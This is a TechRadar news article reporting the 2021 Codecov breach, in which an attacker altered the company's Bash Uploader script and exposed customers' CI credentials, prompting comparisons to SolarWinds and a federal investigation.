Codecov breach triggers fears of another SolarWinds-scale attack

(Image credit: TheDigitalArtist / Pixabay)

US federal authorities are investigating a security breach suffered by software auditing company Codecov.

According to a statement put out by the San Francisco-based firm, an unscrupulous user broke through its digital defenses and modified its Bash Uploader script.

While Codecov has emailed all affected users, the nature of the changes to the script potentially puts thousands of customers at risk.

TechRadar needs yo...

We're looking at how our readers use VPN for a forthcoming in-depth report. We'd love to hear your thoughts in the survey below. It won't take more than 60 seconds of your time.

>> Click here to start the survey in a new window<<

Analysis of the breach suggests the threat actor took advantage of a shortcoming in Codecov’s Docker image creation process, which allowed them to extract the credentials necessary to modify the Bash Uploader script.

Another SolarWinds?

Worryingly, it has emerged that the script was tampered with several times and the earliest unauthorized modification dates back to January 31, 2021. 

As per reports, the intrusion was only detected several months later on April 1, thanks to a customer who noticed that there was something amiss.

In its statement, Codecov warns that any customers that have executed the tampered Bash Uploader script run the risk of losing their credentials, tokens, or keys stored in their continuous integration (CI) environments. 

While Codecov has taken a number of steps to address the breach, the attack has triggered fears of a SolarWinds-scale supply chain attack, primarily because of the length of time the tampered script remained in use and given the size of Codecov’s customer base.

Codecov has announced that a federal investigation into the incident is in progress.

Via Reuters

Mayank Sharma

With almost two decades of writing and reporting on Linux, Mayank Sharma would like everyone to think he’s TechRadar Pro’s expert on the topic. Of course, he’s just as interested in other computing topics, particularly cybersecurity, cloud, containers, and coding.